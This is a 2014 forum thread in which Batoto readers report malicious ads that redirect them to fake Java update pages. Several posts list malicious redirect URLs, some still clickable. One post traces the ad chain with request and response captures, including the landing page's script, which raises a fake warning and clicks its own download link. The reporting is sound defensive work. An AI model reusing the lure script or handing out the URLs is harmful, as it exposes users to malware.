421 replies to this topic

[JRave]

The source of most of these virus/malware ads seems to be adnxs.com and all of it's subdomains.  I say this because everytime I test it out, adnxs is always loaded prior to the redirect or the "you are missing this plugin" ad.  Likewise google's safe browsing site also shows that it has served malware.  http://www.google.com/safebrowsing/diagnostic?site=adnxs.com/

 

The issue is what ad network(s) is this obvious malware site slipping in with.  Grumpy, I do not know what ad networks the site uses or how many there are total.. But is it possible to setup "dummy pages" where only a single ad network per page is allowed?  I think it might be somewhat easier to narrow down what network is compromised.

[Akumetsu]

I got redirected to a fake java page. Been getting quite a few of these lately :c

Page I was on:

Spoiler

Page I got redirected to:

Spoiler

hxxp://www.updooring.com/NL/?dv1=show5&dv2=&dv3=&dv4=mariRM-NL&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldR7kOeNcCuC3i8fAuE7asdhnoQzA8aNkYdNau%EB&marketing_fid=MTQwMzA2MDIxOS1iOTA0NTRhNzM3MTE3NDFlNTY3MWQzMmEwZjQ1NTFjZA==

 

Edit: 10 Mins later..

 

Spoiler

http://vatoto.com/read/_/56680/id-the-greatest-fusion-fantasy_v8_ch45_by_kmts/7

 

Spoiler

hxxp://www.updooring.com/NL/?dv1=show5&dv2=&dv3=&dv4=mariRM-NL&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldR7kXE7TCuC3i8fAsdNkXahnoQzA8KNkuK7as%EB&marketing_fid=MTQwMzA2MTQzMC0wNjA5Njg2MWU3ZDk0YmEwOWQ1N2Q5YzY5ZjU5MDJhOQ==

 

Oh and if I refresh the page a few times I get redirected again.

Edited by Akumetsu, 18 June 2014 - 03:22 AM.

[baroner]

http://vatoto.com/comic/_/comics/monster-musume-no-iru-nichijou-r4280

 

seems there is a trojan there tho my norton blocks it i figure i have you check it out for those who antivirus couldn't block it like norton can. Also just got hit with another one thankfully norton protected me here are the link and the page i found it on.

hoop://www.usdownfuhsd.com/US/index.php?dv1=10797761&dv2=&dv3=&dv4=clickf-US&sec_id=qWJ8vBQjIEzEzrerClzpvEJov2ekD38jfEh0zk84PBNbhniQYk8aNaMb7rCmqnuRNaN8NBOa&marketing_fid=MTQwMzIxMTI2OS1iN2JkMTg3NDFmNDkzN2Y5ZjViYTgzNjgxMzk3ODdkOQ==

http://vatoto.com/read/_/251270/kiss-my-ass_v1_ch3_by_mk42dragon-scanlations/24

Edited by Naizumi, 20 June 2014 - 11:20 AM.

[firathmagi]

the new flash animated ads keep causing my browser (firefox) to freeze/crash

[TheBlackOx]

Since last week, I've been getting a popup window saying i need my Java 'updated', and no matter where I click (be it OK or close) it redirects me to this page:
 

Spoiler

It seems to be from dl.lhpuk.com, at least this time.

 

As to where it pops up, I can't say much, since it was on the home page (www.batoto.net)
 

Also, I have a Windows 7, and am using Google Chrome as my browser.

[wtrmute]

I'm getting the same dl.lhpuk.com "ad" as TheBlackOx, above.  Of course, hitting the "back" button on the browser simply reloads the add and shunts me back to their page to automatically download their EXE.  This one is pretty malicious, and we'd appreciate if you had some really strong words for your ad providers regarding this, as sometimes it happens five times in a span of ten minutes.
 
Thanks!
 
EDIT 22:40 UTC: Got it again, this time from soft.zzstny.com.  The lhpuk.com domain above seems to have already been suspended by the registrar (GoDaddy.com, apparently).
 
In both cases these ads were seen from the main page.
 
EDIT 02:40 UTC: Got it once more, and had the presence of mind to enable Chrome's Developer tools.  The call is made to ads.qadserve.com which calls a script.  Here's the dirt:
 

Spoiler

On the main page, between the "My Follows" and the "Popular Series" lists, there's an ad space:

<div class="general_box clearfix"><iframe src='/ads/mari300.html' frameborder='0' scrolling='no' style='border:0;padding:0;margin:0;width:300px;height:250px;'></iframe></div> 

REQUEST: GET hxxp://vatoto.com/ads/mari300.html

RESPONSE: text/html:

<!DOCTYPE html>
<html>
    <head>
<style>
html, body {margin:0; padding:0}
</style>
        <title>Ad Page</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    </head>
    <body>
<script type='text/javascript' src='http://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250'></script>
    </body>
</html>

REQUEST: GET hxxp://ads.qadserve.com/t?id=d4cd04fe-9560-498b-9fd1-b6ea60e57822&size=300x250
RESPONSE: application/javascript:

document.write('<SCR'+'IPT TYPE="text/javascript" SRC="http://ib.adnxs.com/ttj?id=2547769&size=300x250"></SCR'+'IPT>');

REQUEST: GET hxxp://ib.adnxs.com/ttj?id=2547769&size=300x250
RESPONSE: text/html (in spite of this clearly returning javascript; I added newlines in a couple of places to make the actual redirection more obvious):

(function(){
function r(r){try{if(!window.location.ancestorOrigins)return;for(var n=0,t=window.location.ancestorOrigins.length;n<t;n++){r.call(null,window.location.ancestorOrigins[n],n)}}catch(o){}return[]}function n(r){var n=[],t;do{t=t?t.parent:window;try{r.call(null,t,n)}catch(o){n.push({})}}while(t!=window.top);return n}var t=n(function(r,n){n.push({referrer:r.document.referrer||null,location:r.location.href||null})});r(function(r,n){t[n].ancestor=r});var o='';for(var e=t.length-1;e>=0;e--){o=t[e].location;if(!o&&e>0){o=t[e-1].referrer;if(!o){o=t[e-1].ancestor}}if(o){break}}o=encodeURIComponent(o);
var i='http://ib.adnxs.com/ttj?ttjb=1&bdref='+o+'&id=2547769&size=300x250';
document.write('<script src="'+i+'"></'+'script>')})();

REQUEST: GET hxxp://ib.adnxs.com/ttj?ttjb=1&bdref=http%3A%2F%2Fwww.batoto.net%2F&id=2547769&size=300x250
RESPONSE: application/javascript:

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://nym1.ib.adnxs.com/if?enc=ukkMAiuHhj_029eBc0aEPxsv3SQGgaU_9NvXgXNGhD-6SQwCK4eGPxy3HcaQeoEeRezi_nTj9XsdQaZTAAAAADngJgB2AgAA5gYAALoAAAA8tsIASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzXsAAgUCAQIAAI4APSfpOQAAAAA.&cnd=AS750-BR&udj=update_campaign(12760636%2C+false)&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1"></iframe>');document.write('<scr' + 'ipt src="http://cdn.adnxs.com/ANX_async_usersync.js"></scr'+'ipt>');

REQUEST: GET hxxp://nym1.ib.adnxs.com/if?enc=ERoMocEQqj8bL90kBoGlPxsv3SQGgaU_r0fhehSuvz8zMzMzMzPDP93skZK1Dip7Rezi_nTj9Xu_QKZTAAAAADngJgB2AgAArwcAAAIAAADY7vkASBMGAAAAAQBVU0QAVVNEACwB-gDYdgAAzrUAAgUAAQIAAI4AYCZbgAAAAAA.&cnd=!ySMh5Aiho4ACENjd5wcYACDIphgwADgAQABIrw9QucCbAVgAYLUGaABwBHjkA4ABBIgB5AOQAQGYAQGgAQGoAQOwAQC5ATMzMzMzM8M_wQEzMzMzMzPDP8kB9ig4Urx0-T_ZAQAAAAAAAPA_4AEA9QGamZk-&ccd=!QAZnOQiho4ACENjd5wcYyKYYIAA.&udj=uf('a'%2C+341838%2C+1403404479)%3Buf('c'%2C+4198817%2C+1403404479)%3Buf('r'%2C+16379608%2C+1403404479)%3B&vpid=77&apid=263679&referrer=http%3A%2F%2Fwww.batoto.net%2Fads%2Fmari300.html&media_subtypes=1&ct=0&dlo=1
RESPONSE: text/html:

<iframe src="http://cher.ehomestudy.com/300x250.html" frameborder="0" scrolling="no" width="300" height="250"></iframe> 

REQUEST: GET hxxp://cher.ehomestudy.com/300x250.html
RESPONSE: text/html:

<html><head><title></title><meta name="robots" content="noindex"></head><body><iframe src="http://dl.lhpuk.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3" frameborder="0" scrolling="no" width="1" height="1"></iframe></body></html>

 Oddly enough, even though this last iframe has dl.lhpuk.com in its src attribute, the next request is actually made to soft.zzstny.com...

REQUEST: GET hxxp://soft.zzstny.com/topic/java/go.php?code=java&country=BR&aid=102&ext=3

RESPONSE: text/html:

<html><head><meta charset="utf-8"><title>Download Java for Your PC</title></head><body><a href="/topic/java/download.php?country=BR&ext=3&aid=102" id="reloc" target="_top" style="text-decoration:none;color:#fff;">loading...</a><script type="text/javascript">function invokeClick(o){ if(o.click)o.click(); else if(o.fireEvent)o.fireEvent("onclick"); else if(document.createEvent) { var evt = document.createEvent("MouseEvents"); evt.initEvent("click", true, true); o.dispatchEvent(evt); }} alert("ATENÇÃO! \nSua Versão do Java está Desatualizada, Há Riscos de Segurança, \nPor Favor Atualize Agora!");invokeClick(document.getElementById("reloc"));</script></body></html>

And this one creates a link, generates an alert(), and programmatically clicks on the link it created itself.  Pretty sneaky stuff.

 

So I guess this one is from 

Edited by wtrmute, 22 June 2014 - 03:38 AM.

[Gendalph]

What: popup with redirect to malware downloader
According to user it triggers a popup, that when clicked in any way redirects him to landing page
At: http://vatoto.com/read/_/82704/homunculus_v15-part-2_by_illuminati-manga
Redirected to: dl.lhpuk.com/topic/java/download.php?country=BR&ext=3&aid=102

I managed to get some more details, contents of Chrome's Dev Tools Elements tab http://pastebin.com/72szV5eB
Console: http://pastebin.com/DGaTPxED
And actual ad code (which I got from that paste):

Spoiler

<div style="position:absolute; right:50%; top:0;">
	<div style="position:relative; left:50%;">
		<div id="topa" style="margin-top: 5px; margin-bottom: 5px; width:728px; margin-left: auto; margin-right:auto; text-align:center;">
			<iframe src="/ads/fidelity728.html" width="728" height="90" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe>
		</div>
	</div>
</div>


<div style="width: 160px; height: 700px; position: absolute; top:100px; right:0; ">
	<div style="width: 160px; padding-top: 5px; margin: 0 auto;">
		<iframe src="/ads/fidelity160.html" width="160" height="600" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe>
	</div>
</div>

[Ihlion]

I were reading the latest Silver Spoon chapter (http://vatoto.com/read/_/252425/silver-spoon_ch103_by_red-hawk-neo/4) when it started to redirect me, though due to Norton internet protection the malicious site is blocked for me so I do not know what it is trying to do exactly. The site I am redirected to is: 

http://www.updooring.com/NO?dv1=show5&dv2=&dv3=&dv4=mariRM-NO&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldRNaurN2CuC3i8fAsb7Av4hnoQzA8rPBXe7Aw%EB&marketing_fid=MTQwMzUzNDAyMS0yM2Q0MDVhZjZhMThiOTExMjMzMDIzNDc1ZGNiODZlZg==

I use the latest Chrome, Win 7

 

Norton calls it a Web Attack: Malicious File Download 12

the attacker is identified as seen bellow

www.updooring.com (91.218.115.42, 80)

Edited by Ihlion, 23 June 2014 - 02:51 PM.

[Rhymenoise]

the new flash animated ads keep causing my browser (firefox) to freeze/crash

 

I have been getting crashes too but I haven't been able to link it to any ad in particular.

I haven't posted about it because I've been unable to replicate it nor find a sorce other than Batoto.

If I find the sorce I'll post it asap.

[Loekie007]

Hi

 

Lately I read a lot batoto manga on my smartphone (Nokia Lumia 820, Windows 8.1 os using internet explorer) when i read manga i am redirected to the following link

http://www.updooring.com/NL/?dv1=show5&dv2=&dv3=&dv4=mariRM-NL&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldR7asENrCuC3i8fAudNkv8hnoQzA88Nkve7Aw%EB&marketing_fid=MTQwMzU2MzIxMS05OTEyODFkYjJmZDk0NWRlYzliZDkwOGYzNTQwMDMyNw==

i don't know which ad it was but the only one I get a glimpse of is a ad with a surfer on it but, I can't make a screenshot because I am redirected immediately.

 

 

the link is about updating Java.

Edited by Naizumi, 25 June 2014 - 09:05 PM.

[addictoholic]

I use Firefox, Windows 8 and have constantly been automatically redirected to this link for at least the past few months.

http://www.updooring.com/GB/?dv1=show5&dv2=&dv3=&dv4=mariRM-GB&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldR7BM8PTCuC3i8fAMePAOrhnoQzA8ENaY87aY%EB&marketing_fid=MTQwMzYzODM2MC1mMjhhYjRhNzNmOWQ0MWFkNzRjNjdjZWEwYzY4OTU0Ng==

 
Keep getting the updating Java link on pretty much any page on Batoto including the home page. Today it was every page of Shokugeki no Soma.

Edited by Gendalph, 24 June 2014 - 09:13 PM.

[gimee]

Same as the two previous posts, since yesterday, I keep being redirected to this link while I read from Batoto:

 

 

http://www.updooring.com/CA?dv1=show5&dv2=&dv3=&dv4=mariRM-CA&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldRNAuaN2CuC3i8fAv3NawahnoQzA8e7aNePBw%EB&marketing_fid=MTQwMzY0NzU2Ni0xODA5MWRkMWUyYTg5YzkwMTc1MTA1NTZmODVlMDhkYQ==

 

Here's the message I get from Norton:

 

"An intrusion attempt by 91.218.115.42 was blocked"

 

"IPS Alert Name: Web Attack Malicious File Download 12"

 

I don't know which ad it is either, same as the others, I get redirected before being to identify the ad. Before being able to read anything actually, so it gets really annoying...

 

I'm using Chrome on Windows Vista.

 

Edit: I have no idea how to make a hyperlink un-clickable, sorry for that

 

Edit 2: I do now

Edited by gimee, 25 June 2014 - 04:24 AM.

[Snow-san]

I don't know why but I kept getting an "Threat Detected" from my anti-virus software... while only reading this yesterday: http://vatoto.com/read/_/252964/sekainohate-de-aimashou_v7_ch40_by_simple-scans

 

It said something like "Threat: Http://Script.ini" or something similar. Sorry I didn't take a screenshot for it(was reading it at 2am >.>) but that's what kept popping up on EVERY PAGE I read. I tested by reading other manga's and no alert/threat message.

 

EDIT: I check it again once I get home tonight and see if it pops up again, if not I'll look through my antivirus threat history and past the screenshots. I'm sorry, I wasn't thinking when it happened (>.<)

Edited by Snow-san, 25 June 2014 - 08:29 PM.

[Rhymenoise]

Spoiler

http://vatoto.com/read/_/37097/gamble-fish_ch60_by_omfgg-scans/7

 

Flash ad with pulsing boobs >_>

And a bad rip off of Ashe but still pulsing boobs....

[EmperorBeef]

Spoiler

 

Getting the same java update redirect to something like "updooring dot com" that everyone else seems to be getting.

I didn't link the page it came from because it's coming from literally every other page of every comic I read on your site. It is occuring with extreme frequency and is very obnoxious. I'm using Chrome and am accessing from Canada, if that helps. It's making it incredibly difficult to read anything, as I only have a second to read the page before the redirect happens and i have to hit back and then forward again and then the redirect happens ad infinitem.

I don't use adblock on your site, but am considering it because of this.

Edited by EmperorBeef, 27 June 2014 - 07:33 PM.

[Larg]

Literally, word for word, the exact same problem, location, etc., as Emperor Beef's complaint.  I can't even read a page without it redirecting to this.  Yesterday it was every page of the 'Usotsuki Engage' update, and today it's with every page of the the 'Love Lab' update.

Edited by Larg, 27 June 2014 - 09:06 PM.

[apulpo]

Getting redirected to: http://www.updooring.com/BR/?dv1=show2&dv2=&dv3=&dv4=mariRM-BR&sec_id=qWJ8vBQjIEzEzreaqZipDn7pCZO6Y3RmIaRmqldR7BX87TCuC3i8fAM37aMbhnoQzA8dNaV4Nku%EB&marketing_fid=MTQwMzkzOTgzMi0zMjY3N2ZhZDc5ZDMxNWI0NTI2Y2QxNGI4M2FhNGQwMA==

 

While reading: http://vatoto.com/read/_/220182/nisekoi_ch107_by_red-hawk-scans/2

 

Please...

[bug sniper]

The SekiNdo video ad that looks like this: http://puu.sh/9OoPQ/ef7805761d.jpg on the main page greatly slows down my browser in Chrome, using 500 megabytes of memory and 35% of my CPU. When this happens, I am forced to terminate flash in order to continue browsing at a reasonable speed. After I terminate Flash to allow my computer to go faster again, it looks like this: http://puu.sh/9OoZt/6af5c792ef.png, with multiple puzzle pieces most likely representing multiple performance-degrading ad components.

Edited by bug sniper, 28 June 2014 - 11:03 PM.

[Snow-san]

Ok so the same attack happened again, while reading http://vatoto.com/read/_/254279/sekainohate-de-aimashou_v7_ch41_by_simple-scans/16  , but this time I have the proof XD

I assume that it says hxxp is because my antivirus did that >.> IDK

Spoiler

hxxp://ads.adsrvmedia.com/player.html?a=31241065&size=160x600&context=c36291622&ci=1&u=http%3A%2F%2Fdata.taggify.net%2Ftag%3Fid%3D2261%26publisher_id%3D4518%26rtb%3D1%26product_id%3D9%26campaign_id%3D2057%26bid%3DMC4wMDAx%26ts%3D14040558213483%26price%3D0.09%
 

Here is what my Antivirus says

Spoiler

And it continues to happen on every page I read... it shows up with an ad that looks like this

Spoiler

 

And again, here is more proof that it happens whenever the above ad appears... this pic is big... sorry

Spoiler

Edited by Snow-san, 29 June 2014 - 03:51 PM.

[purplecat]

1. http://vatoto.com/read/_/15961/zettai-karen-children_ch79-88.5_by_js-scans/144

2. -

3. I keep getting an 'unresponsive script' dialog from Firefox, which says the following script is unresponsive: hxxp://www.lijit.com/delivery/fp?u=GiantRealm&z=156456&ljt_giantid=0UEP0wZt1VuV2Kot0SJkVk2_3S02va02va0&n=1:1 Most of the time this then causes firefox to freeze and I have to force-quit. This is happening on almost every manga page, not just the URL in (1).

4. Firefox v30.0, Mac OS X v10.9.3

5. NA

6. NA